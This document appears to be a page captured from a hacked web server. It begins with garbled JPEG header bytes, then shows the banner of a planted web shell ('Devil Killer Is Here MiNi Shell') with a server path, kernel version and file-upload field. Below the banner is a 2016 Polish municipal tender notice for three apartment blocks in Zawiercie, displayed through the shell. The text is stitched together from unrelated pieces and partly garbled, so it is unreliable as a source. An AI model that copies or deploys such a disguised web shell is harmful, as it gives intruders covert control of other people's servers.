JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160217/35106-N-2016.html

<p class="kh_header"><b>Zawiercie: Budowa trzech budynków  komunalnych wielorodzinnych w Zawierciu przy ul. Obrońców Poczty Gdańskiej w ramach zadania pn.: Zagospodarowanie przestrzeni miejskich w celach społecznych poprzez budowę obiektów budownictwa komunalnego wraz z wewnętrznymi instalacjami wodnokanalizacyjnymi, gazu, centralnego ogrzewania, wentylacji, wewnętrznymi i zewnętrznymi instalacjami elektrycznymi i teletechnicznymi, zagospodarowaniem terenu wraz z częścią drogową i parkingami oraz sieciami wodociągowymi, kanalizacji sanitarnej, kanalizacji deszczowej i przyłączami tych sieci do budynków.</b><br>
<b>Numer ogłoszenia: 35106 - 2016; data zamieszczenia: 17.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 32 49 41 267, faks 32 67 22 684.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa trzech budynków  komunalnych wielorodzinnych w Zawierciu przy ul. Obrońców Poczty Gdańskiej w ramach zadania pn.: Zagospodarowanie przestrzeni miejskich w celach społecznych poprzez budowę obiektów budownictwa komunalnego wraz z wewnętrznymi instalacjami wodnokanalizacyjnymi, gazu, centralnego ogrzewania, wentylacji, wewnętrznymi i zewnętrznymi instalacjami elektrycznymi i teletechnicznymi, zagospodarowaniem terenu wraz z częścią drogową i parkingami oraz sieciami wodociągowymi, kanalizacji sanitarnej, kanalizacji deszczowej i przyłączami tych sieci do budynków..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Budowa trzech budynków  komunalnych wielorodzinnych w Zawierciu przy ul. Obrońców Poczty Gdańskiej w ramach zadania pn.: Zagospodarowanie przestrzeni miejskich w celach społecznych poprzez budowę obiektów budownictwa komunalnego wraz z wewnętrznymi instalacjami wodnokanalizacyjnymi, gazu, centralnego ogrzewania, wentylacji, wewnętrznymi i zewnętrznymi instalacjami elektrycznymi i teletechnicznymi, zagospodarowaniem terenu wraz z częścią drogową i parkingami oraz sieciami wodociągowymi, kanalizacji sanitarnej , kanalizacji deszczowej i przyłączami tych sieci do budynków.

Charakterystyka obiektu:
Zewnętrzne wymiary obiektów (zróżnicowany rzut):
szerokość 13,43m i 15,63 m,
długość 18,73m i 21,52 m.

Powierzchnia zabudowy jednego budynku: 302,95m2. 
Powierzchnia użytkowa jednego budynku:1.199,92 m2,
w tym: 
powierzchnia użytkowa mieszkań: 816,12 m2,
powierzchnia użytkowa piwnic ( komórki lokatorskie, pomieszczenia porządkowe 
z przyłączem wody, pomieszczenie rezerwowe): 142,42 m2,
powierzchnia użytkowa komunikacji  ( klatki schodowe + korytarze, korytarze piwnic, wiatrołap): 196,30m2,
 powierzchnia strychu:45,08 m2.
Kubatura jednego budynku: 4847,20 m3.

Każdy z  budynków posiada:
20 mieszkań,
1 klatkę schodową,
4 kondygnacje nadziemne,
1 kondygnację podziemną,
20 komórek lokatorskich,
1 pomieszczenie porządkowe z przyłączem wody,
2 pomieszczenia rezerwowe.

Powierzchnie poszczególnych kategorii mieszkań dla jednego budynku:
M2 1 pokój+ kuchnia = 29,10 m2- 4 mieszkania,
M3 2 pokoje + kuchnia = 43,53 m2- 4 mieszkania,
M3 2 pokoje + kuchnia = 43,40 m2- 4  mieszkania ( w tym 1 dla osób niepełnosprawnych),
M3 2 pokoje + kuchnia = 44,00 m2- 8 mieszkań.

W sumie w trzech budynkach A,B,C znajduje się 60 mieszkań.

Powierzchnia terenu na którym zlokalizowano 3 budynki komunalne (A,B,C) wraz z otaczającym je zagospodarowaniem wynosi: 11.970,00m2, w tym m.in.:
Powierzchnia zabudowy - 3x302,95m2,
Powierzchnia parkingów (60 miejsc) - 772,98m2,
Powierzchnia dróg wewnętrznych - 799,80m2,
Chodniki o szerokości 1,50m i 2,50m o  łącznej powierzchni: 596,82m2,
Ciągi pieszo- jezdne o szerokości 3,00m o łącznej powierzchni: 313,41m2,
Powierzchnia placu gospodarczego z obudowywanym śmietnikiem i trzepakiem 41,65m2,
Powierzchnia placu zabaw 176,62m2,
Powierzchnia placu rekreacyjnego (chodnik o szer. 2,50m w kształcie pierścienia) 58,87m2

Budynki komunalne (A,B,C) wraz z otaczającym je zagospodarowaniem będą znajdować się na dz. 25/26; 25/42; 25/43; 25/48. Na pozostałych działkach została zlokalizowana infrastruktura w postaci wodociągu z przyłączem, kanału deszczowego, kanału sanitarnego z przyłączem, kanału sanitarnego tłocznego oraz tłoczni( dz. nr 105/5). 
Trzy budynki komunalne mieszkalne wielorodzinne (A,B,C) ustawione zostały w układzie wschód - zachód. Teren został ukształtowany kaskadowo za pomocą skarp, z wykorzystaniem różnic w poziomach terenu.
Przedmiot zamówienia obejmuje wykonanie miejsc postojowych, placu gospodarczego z przeznaczeniem na trzepak i zadaszonego miejsca na kontenery na śmieci. Łącznie należy wykonać 60 miejsc parkingowych: 57 miejsc dla samochodów osobowych oraz trzy miejsca dla osób niepełnosprawnych.
Nawierzchnie jezdni wewnętrznych oraz miejsc postojowych należy wykonać z betonowej kostki brukowej o gr. 8 cm w kolorze grafitowym.
Pomiędzy budynkami mieszkalnymi wielorodzinnymi należy wykonać dojścia o szerokości 1,50m oraz chodniki wokół placu zabaw oraz placu rekreacyjnego dla osób starszych o szerokości 2,50m, na których zostaną ustawione ławki oraz kosze na śmieci.
Plac zabaw - nawierzchnia rekreacyjna, EPDM występująca w elementach o wymiarach 500x500mm i grubości 50mm. Nawierzchnia z różnokolorowych płytek.
Plac zabawa winien zostać wyposażony w następujące urządzenia:
piaskownica sześciokątna 1,2m - 1szt;
 huśtawka podwójna wahadłowa - 1 szt;
zestaw zabawowy- szt 1- zjeżdżalnia , skała wspinaczkowa, sklepik, zadaszona wieża, schodki;
Wokół placu zabaw i na placu rekreacyjnym oraz przy chodnikach wykonać ławki z oparciem oraz kosze na śmieci.

Uzbrojenie terenu:
zaopatrzenie w wodę - przyłącza (PE 100-RC  SDR 11 fi 90/8,2mm) - źródłem zasilania dla zaprojektowanej sieci jest istniejący wodociąg fi 350mm;
odprowadzenie ścieków - przyłącza (fi200/5,9mm z PVC - U ze ścianką litą i wydłużonym kielichem,
odprowadzenie wód deszczowych - przyłącza włączone do odcinka sieci kanalizacji deszczowej włączonego do istniejącego rowu melioracyjnego,
drenaż wokół budynków z rur drenarskich o średnicy Dz 2x125mm,
drenaż francuski pod parkingiem,
zaopatrzenie w gaz - przyłącze gazu,
ogrzewanie - indywidualna instalacja c.o. zasilana gazowymi kotłami dwufunkcyjnymi,
ciepła woda użytkowa j.w.,
kanalizacja teletechniczna,
instalacja elektryczna - oświetlenia i gniazd wtykowych, odgromowa
instalacja telefoniczna,
instalacja logiczna,
instalacja antenowa,
instalacja domofonowa,
instalacja oświetlenia terenu.

Zakres robót budowlanych obejmuje również wyburzenie i utylizację gruzu dawnej wymiennikowni usytuowanej w sąsiedztwie budynków.

Ponadto do obowiązków Wykonawcy należeć będzie wykonanie inwentaryzacji wszystkich prac zbiorczo na jednym arkuszu mapy.

Szczegółowy opis przedmiotu zamówienia zawiera:
przedmiar robót,
dokumentacja projektowa (budowlano-wykonawcza),
specyfikacje techniczne wykonania i odbioru robót budowlanych,
które stanowią załączniki do niniejszej specyfikacji istotnych warunków zamówienia (dalej siwz). Ponadto obowiązki Wykonawcy związane z realizacją zamówienia określa także załączony do SIWZ wzór umowy.

Tam, gdzie w dokumentacji projektowej, przedmiarach, specyfikacji technicznej wykonania i odbioru robót został wskazany znak towarowy (marka), producent, dostawca, patent, pochodzenie materiałów lub wskazanie norm, aprobat, specyfikacji technicznych i systemów odniesień, o których mowa w art. 30 ust. 1-3 ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych w stosunku do wskazanych w dokumentacji projektowej i STWiOR pod warunkiem, że zagwarantują one realizację robót w zgodzie z uzyskanym pozwoleniem na budowę, zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej i STWiOR oraz będą zgodne pod względem:
gabarytów i konstrukcji (wielkość, rodzaj, właściwości fizyczne, liczba elementów składowych,
charakteru użytkowego (tożsamość funkcji),
charakterystyki materiałowej (rodzaj i jakość materiałów),
parametrów technicznych (wytrzymałość, trwałość, dane techniczne, dane hydrauliczne, charakterystyki liniowe, konstrukcja),
parametrów bezpieczeństwa użytkowania,
standardów emisyjnych,

Ilekroć w specyfikacji technicznej wykonania i odbioru robót, dokumentacji projektowej mowa jest o polskich normach, należy przez to rozumieć polskie normy przenoszące normy europejskie lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego, a w razie ich braku inne stosowne normy w kolejności zgodnej z art. 30 ust. 2 i 3 ustawy Prawo zamówień publicznych.

Materiały i urządzenia użyte do wykonania umowy powinny odpowiadać, co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie określonych w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409), ustawie z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2004 r. nr 92, poz. 881 z późn. zm.) oraz wymaganiom specyfikacji technicznych wykonania i odbioru robót i SIWZ.

Wykonawca na każde żądanie inspektora nadzoru lub Zamawiającego zobowiązany jest do okazania w stosunku do wskazanych materiałów znaków bezpieczeństwa, deklaracji zgodności lub aprobaty technicznej lub certyfikatu zgodności z Polską Normą przenoszącą normy europejskie lub normą państw członkowskich Europejskiego Obszaru Gospodarczego przenoszącą tę normę lub Polską Normą w przypadku braku Polskiej Normy przenoszącej europejskie.

Wykonawca zobowiązany jest do udzielenia minimum 36-miesięcznej gwarancji oraz minimum 36-miesięcznej rękojmi na wykonany przedmiot zamówienia.

Wspólny Słownik Zamówień Publicznych (CPV): 
Architektura i konstrukcja
45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej
45211000-9 Roboty budowlane w zakresie budownictwa wielorodzinnego i domów jednorodzinnych
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
45262300-4  Betonowanie
45262310-7 Zbrojenie
45262400-5 Wznoszenie konstrukcji ze stali konstrukcyjnej
45262500-6 Roboty murarskie i murowe
45421141-4 Instalowanie przegród
45432100-5 Kładzenie i wykładanie podłóg
45432000-4 Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian
45431000-7 Kładzenie płytek
45442100-8 Roboty malarskie
45421100-5 Instalowanie drzwi i okien i podobnych elementów
45421146-9 Instalowanie sufitów podwieszanych
45320000-6 Roboty izolacyjne
45410000-4 Tynkowanie
45261000-4 Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty
45261210-9 Wykonywanie pokryć dachowych
Zagospodarowanie terenu z częścią drogową
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
45112710-5 Roboty w zakresie kształtowania terenów zielonych 
37535200-9 Wyposażenie placów zabaw
45233120-6 Roboty w zakresie budowy dróg
45233250-6 Roboty w zakresie nawierzchni z wyjątkiem dróg
45233290-8 Instalowanie znaków drogowych
45112600-1 Wycinanie i napełnianie
45233221-4 Malowanie nawierzchni 
45110000-1 Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty
                    ziemne
Instalacje elektryczne i teletechniczne oraz oświetlenie terenu
45311000-0 Roboty w zakresie okablowania oraz instalacji elektrycznych
31311000-9 Podłączenia energetyczne
31321210-7 Kabel niskiego napięcia
31527210-1 Latarnie
45311200- 2 Roboty w zakresie instalacji elektrycznych
45310000- 3 Roboty instalacyjne elektryczne
32410000-0 Lokalna sieć komputerowa
32561000-3 Podłączenia z włókna optycznego
31527200-8 Oświetlenie zewnętrzne

Sieć wodociągowa i kanalizacja sanitarna
Przyłącza wod- kan.
45231300-8 Roboty budowlane w zakresie budowy wodociągów i rurociągów 
                    do odprowadzania ścieków.
Sieć kanalizacji deszczowej
Przyłącza kanalizacji deszczowej i drenażu opaskowego 
45233140-2 Roboty drogowe 
45231000-5 Roboty budowlane w zakresie budowy rurociągów, ciągów
                     komunikacyjnych i linii energetycznych
45232130-2 Roboty budowlane w zakresie rurociągów do odprowadzania wody
                     burzowej
Instalacja wod- kan, gazu , c.o. i wentylacji
45332000-3 Roboty instalacyjne wodne i kanalizacyjne
45330000-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne
45333000-0 Roboty instalacyjne gazowe
45331100-7 Instalowanie centralnego ogrzewania
45331200- 8 Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.21.10.00-9, 45.11.12.00-0, 45.26.23.10-7, 45.26.25.00-6, 45.42.11.41-4, 45.43.21.00-5, 45.43.20.00-4, 45.43.10.00-7, 45.44.21.00-8, 45.42.11.00-5, 45.42.11.46-9, 45.32.00.00-6, 45.41.00.00-4, 45.26.10.00-4, 45.26.12.10-9, 45.11.11.20-0, 45.11.27.10-5, 37.53.52.00-9, 45.23.31.20-6, 45.23.32.50-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 23.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 200 000,00 zł.
2.	Wadium musi obejmować cały okres związania ofertą, zgodnie z postanowieniami punktu IX SIWZ i może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju  
Przedsiębiorczości.
3.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto: 
URZĄD MIEJSKI w ZAWIERCIU
Bank PEKAO S.A.
KONTO: 74 1240 2975 1111 0010 4312 6805.
z dopiskiem: Budowa trzech budynków  komunalnych wielorodzinnych w Zawierciu przy ul. Obrońców Poczty Gdańskiej w ramach zadania pn.: Zagospodarowanie przestrzeni miejskich w celach społecznych poprzez budowę obiektów budownictwa komunalnego wraz z wewnętrznymi instalacjami wodnokanalizacyjnymi, gazu, centralnego ogrzewania, wentylacji, wewnętrznymi i zewnętrznymi instalacjami elektrycznymi i teletechnicznymi, zagospodarowaniem terenu wraz z częścią drogową i parkingami oraz sieciami wodociągowymi, kanalizacji sanitarnej, kanalizacji deszczowej i przyłączami tych sieci do budynków.

Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
4.	Wadium wnoszone w innych niż pieniądz formach tj:  
1)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem  pieniężnym;
2)	gwarancjach bankowych;
3)	gwarancjach ubezpieczeniowych,
4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz`.U. Nr 109, poz. 1158, z  późn. zm.),

- należy złożyć w oryginale najpóźniej wraz z ofertą (oryginał gwarancji/poręczenia powinien być umieszczony w ofercie w taki sposób, aby nie naruszyć integralności oferty, a jednocześnie  umożliwiający jego zwrot zgodnie z ustawą Pzp - np. umieszczony w koszulce lub osobnej kopercie.

5.	Wadium wniesione w formach, o których mowa w pkt VIII ust. 4 SIWZ musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę określone w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż wykonał należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej dwie roboty budowlane (zamówienia), z których każda obejmowała budowę budynku o kubaturze co najmniej 3 500 m3 oraz wartości brutto każdej z ukończonych robót budowlanych (zamówień) nie mniejszej niż 4 000 000,00 zł (cztery miliony złotych) brutto. 
Prze wartość roboty budowlanej (zamówienia) należy rozumieć kwotę brutto robót budowlanych obejmującą wykonanie zarówno samego budynku (budynków) wraz z obsługującą infrastrukturą techniczną (przyłącza, komunikacja obsługująca budynek (budynki), parkingi, zagospodarowanie terenu).
Jako wykonanie (zakończenie) zadania należy rozumieć wystawienie co najmniej Świadectwa Przejęcia (dla kontraktów realizowanych zgodnie z warunkami FIDIC) lub podpisanie Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia). Wykonawca
potwierdza spełnianie warunku poprzez złożenie: 1) Oświadczenia upoważnionego
przedstawiciela Wykonawcy o spełnieniu warunków udziału w postępowaniu
(załącznik nr 1 do SIWZ). W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie może być złożone wspólnie - oceniany będzie ich łączny potencjał; 2) Wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania (zgodnie z załącznikiem nr 2 do SIWZ) oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wykaz i dowody określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone należy ograniczyć wyłącznie do robót budowlanych potwierdzających spełnienie warunku w zakresie wiedzy i doświadczenia opisanego powyżej.
Dowodami, o których mowa powyżej mogą być:
- poświadczenia,
- inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
W przypadku, gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, o którym mowa powyżej), zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców, albo wszyscy ci Wykonawcy wspólnie - oceniany będzie ich łączny potencjał.
W sytuacji gdy w zamówieniach przedstawionych przez Wykonawcę (na potwierdzenie spełniania warunku) rozliczenie między Wykonawcą a zamawiającym za wykonane zamówienia zostało dokonane w innej walucie niż w złotych polskich, Wykonawca (dla celów oceny oferty) dokona przeliczenia wartości wykonanych zamówień w innej walucie niż w złotych polskich na podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów średnich walut obcych Narodowego Banku Polskiego na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia. Zamawiający wymaga, żeby Wykonawca wykazał, nie później niż
na dzień składania ofert, spełnianie warunku, o którym mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, iż dysponuje lub będzie dysponował osobą (-ami) zdolną (-nymi) do wykonania zamówienia tj. posiadającą (-cymi) prawo do wykonywania samodzielnych funkcji technicznych w budownictwie tj. uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności:
- konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane upoważniające do kierowania robotami budowlanymi będącymi przedmiotem zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- inżynieryjnej drogowej lub odpowiadające im ważne uprawnienia budowlane upoważniające do kierowania robotami budowlanymi będącymi przedmiotem zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane upoważniające do kierowania robotami budowlanymi będącymi przedmiotem zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
